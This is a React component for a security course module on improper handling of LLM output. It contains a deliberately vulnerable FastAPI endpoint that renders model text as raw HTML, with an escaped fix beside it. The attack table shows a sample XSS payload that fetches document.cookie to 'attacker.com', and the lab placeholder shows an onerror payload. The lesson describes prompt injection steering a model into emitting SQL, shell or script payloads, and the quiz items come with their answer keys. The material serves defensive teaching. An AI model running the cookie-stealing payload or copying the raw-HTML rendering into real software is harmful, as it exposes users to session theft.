import React, { useState } from 'react';
import { AlertCircle, BookOpen, CheckCircle, Code, FileOutput, Home, Shield, Terminal, Trophy } from 'lucide-react';
import PythonCode from '../../components/PythonCode';
import Quiz from '../../components/Quiz';

const OutputHandlingModule = ({ onBack, onSectionComplete, completedSections }) => {
  const [activeTab, setActiveTab] = useState('learn');
  const [codeView, setCodeView] = useState('comparison');
  const [labInput, setLabInput] = useState('');
  const [labResult, setLabResult] = useState(null);

  const vulnerableCode = `from fastapi import FastAPI
from fastapi.responses import HTMLResponse
from openai import OpenAI

app = FastAPI()
client = OpenAI()

@app.get("/summarize")
async def summarize(doc_text: str):
    """⚠️ VULNERABLE - model output rendered as raw HTML"""
    response = client.chat.completions.create(
        model="gpt-4",
        messages=[{"role": "user", "content": f"Summarize this: {doc_text}"}]
    )
    # DANGEROUS: the model's text is trusted and rendered directly as HTML -
    # if the summary happens to contain a <script> tag, the browser runs it
    return HTMLResponse(f"<div>{response.choices[0].message.content}</div>")`;

  const secureCode = `from fastapi import FastAPI
from openai import OpenAI
import html

app = FastAPI()
client = OpenAI()

@app.get("/summarize")
async def summarize(doc_text: str):
    """✅ SECURE - model output treated as untrusted, same as any user input"""
    response = client.chat.completions.create(
        model="gpt-4",
        messages=[{"role": "user", "content": f"Summarize this: {doc_text}"}]
    )
    summary = response.choices[0].message.content

    # SAFE: escape before rendering - identical defense to the XSS module,
    # just applied to AI-generated text instead of user-typed text
    safe_summary = html.escape(summary)
    return {"summary_html": f"<div>{safe_summary}</div>"}`;

  const comparisonCode = `from fastapi import FastAPI
from openai import OpenAI
import html

app = FastAPI()
client = OpenAI()

@app.get("/summarize")
async def summarize(doc_text: str):
    """✅ SECURE - model output treated as untrusted, same as any user input"""
    response = client.chat.completions.create(
        model="gpt-4",
        messages=[{"role": "user", "content": f"Summarize this: {doc_text}"}]
    )
    summary = response.choices[0].message.content

    # ❌ OLD (VULNERABLE): return HTMLResponse(f"<div>{summary}</div>")
    # rendered the model's raw text as HTML with no escaping

    # ✅ NEW (SECURE): escape exactly like you would any other untrusted string
    safe_summary = html.escape(summary)
    return {"summary_html": f"<div>{safe_summary}</div>"}`;

  const quizQuestions = [
    {
      id: 1,
      question: "Why is 'improper output handling' essentially the same underlying mistake as XSS, just with a different source?",
      options: [
        "It isn't related to XSS at all",
        "Both happen when untrusted text is rendered/executed without sanitization - the only difference is the untrusted text came from an LLM instead of a form field",
        "XSS only affects user input, never AI output",
        "Improper output handling only applies to SQL, not HTML"
      ],
      correct: 1,
      explanation: "The core defense (escape/sanitize before rendering, or before executing) is identical. What's new is the source of untrusted content: a model can be manipulated (via prompt injection) into producing exactly the kind of malicious payload a classic XSS attacker would have typed by hand."
    },
    {
      id: 2,
      question: "What's the risk of directly executing SQL or shell commands generated by an LLM?",
      options: [
        "There's no risk if the model is 'well-behaved'",
        "It reintroduces SQL/command injection risk, except the 'attacker-controlled input' is now whatever the model was manipulated into generating",
        "It's always faster than writing the query yourself",
        "Only applies to open-source models"
      ],
      correct: 1,
      explanation: "If a model-generated SQL query or shell command is executed directly, any successful prompt injection that manipulates what the model generates becomes a direct SQL/command injection attack - the same validation used in those modules should apply here too."
    },
    {
      id: 3,
      question: "What should the trust boundary look like for LLM output in a well-designed system?",
      options: [
        "LLM output should be trusted completely since it comes from your own model",
        "LLM output should be treated as untrusted input to whatever consumes it next - sanitized before rendering, validated before executing",
        "Only outputs longer than 500 characters need validation",
        "Trust boundaries don't apply to AI-generated content"
      ],
      correct: 1,
      explanation: "The moment output leaves the model, it should be treated exactly like any other untrusted input to the next system that touches it - a browser rendering it, a database executing it, or a shell running it."
    },
    {
      id: 4,
      question: "How does this module connect to Prompt Injection?",
      options: [
        "They're unrelated topics",
        "Prompt injection is often the mechanism attackers use to manipulate what the model outputs; improper output handling is what turns that manipulated output into an actual exploit downstream",
        "Improper output handling only occurs without any user input",
        "Prompt injection can only affect input, never output"
      ],
      correct: 1,
      explanation: "A two-stage attack: first get the model to produce a malicious payload (via prompt injection), then have that payload executed/rendered without validation (improper output handling). Defending only one stage still leaves the other as a gap."
    }
  ];

  const handleLabSubmit = () => {
    const dangerous = /<script|onerror=|onload=|javascript:|<img[^>]*onerror/i.test(labInput);

    if (dangerous) {
      setLabResult({
        safe: false,
        message: "⚠️ Unsafe Output Would Execute!",
        impact: "If this text came back from the model and was rendered as raw HTML, the browser would execute it - identical to a classic XSS payload, except sourced from AI output. Escaping this text before rendering (as the secure version does) neutralizes it completely.",
        rendered: labInput
      });
    } else {
      setLabResult({ safe: true, message: "✅ Text rendered safely", impact: "No executable markup detected. Note the secure implementation escapes ALL output by default, regardless of whether this specific check flags anything - never rely on a denylist alone." });
    }
    onSectionComplete('lab');
  };

  const progressPercent = (Object.keys(completedSections).length / 3) * 100;

  return (
    <div className="min-h-screen bg-gradient-to-br from-slate-900 via-purple-900 to-slate-900 text-white p-8">
      <div className="max-w-6xl mx-auto">
        <button onClick={onBack} className="flex items-center gap-2 mb-6 text-slate-400 hover:text-white transition-all">
          <Home className="w-5 h-5" /> Back to Modules
        </button>

        <div className="mb-6">
          <div className="flex items-center gap-3 mb-4">
            <FileOutput className="w-10 h-10 text-sky-400" />
            <h1 className="text-4xl font-bold">Improper Output Handling</h1>
          </div>
          <div className="bg-slate-800 rounded-lg p-4">
            <div className="flex justify-between items-center mb-2">
              <span className="text-sm text-slate-400">Module Progress</span>
              <span className="text-sm font-bold text-purple-400">{Math.round(progressPercent)}%</span>
            </div>
            <div className="w-full bg-slate-700 rounded-full h-2">
              <div className="bg-gradient-to-r from-purple-500 to-pink-500 h-2 rounded-full transition-all duration-500" style={{ width: `${progressPercent}%` }} />
            </div>
          </div>
        </div>

        <div className="flex gap-2 mb-6 bg-slate-800/50 p-2 rounded-lg">
          {[
            { id: 'learn', label: 'Learn', icon: BookOpen },
            { id: 'lab', label: 'Interactive Lab', icon: Terminal },
            { id: 'quiz', label: 'Quiz', icon: Trophy }
          ].map(tab => (
            <button
              key={tab.id}
              onClick={() => setActiveTab(tab.id)}
              className={`flex-1 flex items-center justify-center gap-2 px-4 py-3 rounded-lg transition-all ${
                activeTab === tab.id ? 'bg-purple-600 text-white shadow-lg' : 'bg-slate-700/50 text-slate-400 hover:bg-slate-700'
              }`}
            >
              <tab.icon className="w-5 h-5" />
              {tab.label}
              {completedSections[tab.id] && <CheckCircle className="w-4 h-4 text-green-400" />}
            </button>
          ))}
        </div>

        {activeTab === 'learn' && (
          <div className="space-y-6">
            <div className="bg-slate-800/50 rounded-lg p-6 border border-slate-700">
              <h3 className="text-2xl font-bold mb-4 flex items-center gap-2">
                <Code className="w-6 h-6 text-purple-400" />
                1. Understanding the Vulnerability
              </h3>
              <p className="text-slate-300 mb-4">
                Improper output handling occurs when an LLM's generated text is passed downstream - rendered as HTML,
                executed as code/SQL, or run as a shell command - without the same validation any other untrusted
                input would receive. It's a direct relative of XSS, SQL injection, and command injection, just with
                the model as the delivery mechanism instead of a form field.
              </p>

              <div className="bg-red-900/20 border border-red-500/50 rounded-lg p-4 mb-4">
                <h4 className="font-bold text-red-400 mb-2">❌ Vulnerable Code Example:</h4>
                <PythonCode code={vulnerableCode} />
              </div>

              <div className="bg-slate-900 border border-slate-700 rounded-lg p-4">
                <h4 className="font-bold mb-3">Attack Examples - Try These in the Lab:</h4>
                <div className="overflow-x-auto">
                  <table className="w-full text-sm">
                    <thead>
                      <tr className="border-b border-slate-700">
                        <th className="text-left p-2 text-purple-400">Attack Type</th>
                        <th className="text-left p-2 text-purple-400">Example</th>
                        <th className="text-left p-2 text-purple-400">Impact</th>
                      </tr>
                    </thead>
                    <tbody>
                      <tr className="border-b border-slate-800">
                        <td className="p-2 font-semibold text-red-400">Output-Based XSS</td>
                        <td className="p-2"><code className="bg-slate-800 px-2 py-1 rounded text-purple-300 text-xs">{'<script>fetch(attacker.com+document.cookie)</script>'}</code></td>
                        <td className="p-2 text-slate-300">Model output rendered as HTML executes attacker JS</td>
                      </tr>
                      <tr className="border-b border-slate-800">
                        <td className="p-2 font-semibold text-red-400">Generated SQL Executed Directly</td>
                        <td className="p-2 text-slate-300">Model asked to write a query, injected text manipulates it into `DROP TABLE`</td>
                        <td className="p-2 text-slate-300">Reintroduces SQL injection through the model as the vector</td>
                      </tr>
                      <tr>
                        <td className="p-2 font-semibold text-orange-400">Generated Shell Command Executed</td>
                        <td className="p-2 text-slate-300">An agent runs a model-suggested command with no review</td>
                        <td className="p-2 text-slate-300">Reintroduces command injection through the model</td>
                      </tr>
                    </tbody>
                  </table>
                </div>
              </div>
            </div>

            <div className="bg-slate-800/50 rounded-lg p-6 border border-slate-700">
              <h3 className="text-2xl font-bold mb-4 flex items-center gap-2">
                <AlertCircle className="w-6 h-6 text-orange-400" />
                2. Why This Matters - Real-World Impact
              </h3>
              <div className="grid md:grid-cols-2 gap-4">
                <div className="bg-red-900/20 border border-red-500/50 rounded-lg p-4">
                  <h4 className="font-bold text-red-400 mb-2">🖥️ Client-Side Code Execution</h4>
                  <p className="text-sm text-slate-300">Unescaped output renders as executable HTML/JS in the browser</p>
                </div>
                <div className="bg-orange-900/20 border border-orange-500/50 rounded-lg p-4">
                  <h4 className="font-bold text-orange-400 mb-2">🗄️ Reintroduced SQLi/Command Injection</h4>
                  <p className="text-sm text-slate-300">Classic vulnerabilities return via the model as the new vector</p>
                </div>
                <div className="bg-yellow-900/20 border border-yellow-500/50 rounded-lg p-4">
                  <h4 className="font-bold text-yellow-400 mb-2">🔗 Compounds With Prompt Injection</h4>
                  <p className="text-sm text-slate-300">One attack gets the model to produce it; this lets it execute</p>
                </div>
                <div className="bg-purple-900/20 border border-purple-500/50 rounded-lg p-4">
                  <h4 className="font-bold text-purple-400 mb-2">🤝 Erodes User Trust</h4>
                  <p className="text-sm text-slate-300">Users blame "the AI" for what's actually a handling bug</p>
                </div>
              </div>
            </div>

            <div className="bg-slate-800/50 rounded-lg p-6 border border-slate-700">
              <h3 className="text-2xl font-bold mb-4 flex items-center gap-2">
                <Shield className="w-6 h-6 text-green-400" />
                3. How to Fix It - Best Known Methods
              </h3>
              <div className="flex gap-2 mb-4 bg-slate-700/50 p-2 rounded-lg">
                <button onClick={() => setCodeView('comparison')} className={`flex-1 px-4 py-2 rounded-lg transition-all ${codeView === 'comparison' ? 'bg-green-600' : 'bg-slate-600 hover:bg-slate-500'}`}>Before/After Comparison</button>
                <button onClick={() => setCodeView('sidebyside')} className={`flex-1 px-4 py-2 rounded-lg transition-all ${codeView === 'sidebyside' ? 'bg-green-600' : 'bg-slate-600 hover:bg-slate-500'}`}>Side-by-Side View</button>
              </div>
              {codeView === 'comparison' ? (
                <div className="bg-green-900/20 border border-green-500/50 rounded-lg p-4 mb-4">
                  <PythonCode code={comparisonCode} />
                </div>
              ) : (
                <div className="grid md:grid-cols-2 gap-4 mb-4">
                  <div className="bg-red-900/20 border border-red-500/50 rounded-lg p-4">
                    <h4 className="font-bold text-red-400 mb-3">❌ BEFORE:</h4>
                    <PythonCode code={vulnerableCode} />
                  </div>
                  <div className="bg-green-900/20 border border-green-500/50 rounded-lg p-4">
                    <h4 className="font-bold text-green-400 mb-3">✅ AFTER:</h4>
                    <PythonCode code={secureCode} />
                  </div>
                </div>
              )}
              <div className="bg-slate-700/50 rounded-lg p-4">
                <h4 className="font-bold mb-3 text-green-400">Output Handling Checklist:</h4>
                <ul className="space-y-2 text-sm text-slate-300">
                  <li>• <strong>Escape Before Rendering:</strong> Treat model output exactly like user input in the XSS module</li>
                  <li>• <strong>Never `eval()` or Directly Execute Generated Code:</strong> Sandbox or validate against an allowlist first</li>
                  <li>• <strong>Parameterize Generated Queries:</strong> Same defense as the SQL Injection module, applied to AI-written SQL</li>
                  <li>• <strong>Structured Output Where Possible:</strong> Constrain the model to a schema (e.g. JSON mode) rather than free text you then have to parse trustingly</li>
                  <li>• <strong>Apply Output Guardrails:</strong> Scan generated content before it reaches a renderer, executor, or end user</li>
                </ul>
              </div>
            </div>

            <button onClick={() => { setActiveTab('lab'); onSectionComplete('learn'); }} className="w-full bg-gradient-to-r from-purple-600 to-pink-600 text-white px-6 py-4 rounded-lg font-bold hover:from-purple-700 hover:to-pink-700">
              Continue to Interactive Lab →
            </button>
          </div>
        )}

        {activeTab === 'lab' && (
          <div className="space-y-6">
            <div className="bg-slate-800/50 rounded-lg p-6 border border-slate-700">
              <h3 className="text-2xl font-bold mb-4">🧪 Interactive Lab: Summary Renderer</h3>
              <p className="text-slate-300 mb-4">
                This simulates model-generated text being rendered as raw HTML. Try normal text, then try HTML/script
                content, as if a manipulated model had generated it.
              </p>
              <div className="bg-slate-900 rounded-lg p-6">
                <label className="block mb-2 font-semibold">Simulated model output:</label>
                <div className="flex gap-3">
                  <input
                    type="text"
                    value={labInput}
                    onChange={(e) => setLabInput(e.target.value)}
                    placeholder={'Try: This document discusses quarterly earnings.  or  <img src=x onerror=alert(1)>'}
                    className="flex-1 bg-slate-800 border border-slate-600 rounded-lg px-4 py-3 text-white focus:outline-none focus:border-purple-500 text-sm"
                  />
                  <button onClick={handleLabSubmit} className="bg-purple-600 hover:bg-purple-700 px-6 py-3 rounded-lg font-bold">Render</button>
                </div>
              </div>

              {labResult && (
                <div className={`mt-4 rounded-lg p-4 border ${labResult.safe ? 'bg-green-900/20 border-green-500/50' : 'bg-red-900/20 border-red-500/50'}`}>
                  <p className={`font-bold ${labResult.safe ? 'text-green-400' : 'text-red-400'}`}>{labResult.message}</p>
                  <p className="text-sm text-slate-300 mt-2">{labResult.impact}</p>
                </div>
              )}

              <button onClick={() => { setActiveTab('quiz'); onSectionComplete('lab'); }} className="w-full mt-6 bg-gradient-to-r from-purple-600 to-pink-600 text-white px-6 py-4 rounded-lg font-bold hover:from-purple-700 hover:to-pink-700">
                Ready for the Quiz? →
              </button>
            </div>
          </div>
        )}

        {activeTab === 'quiz' && (
          <div className="bg-slate-800/50 rounded-lg p-6 border border-slate-700">
            <h3 className="text-2xl font-bold mb-4 flex items-center gap-2">
              <Trophy className="w-6 h-6 text-yellow-400" />
              Knowledge Check Quiz
            </h3>
            <Quiz questions={quizQuestions} onComplete={() => onSectionComplete('quiz')} />
          </div>
        )}
      </div>
    </div>
  );
};

export default OutputHandlingModule;
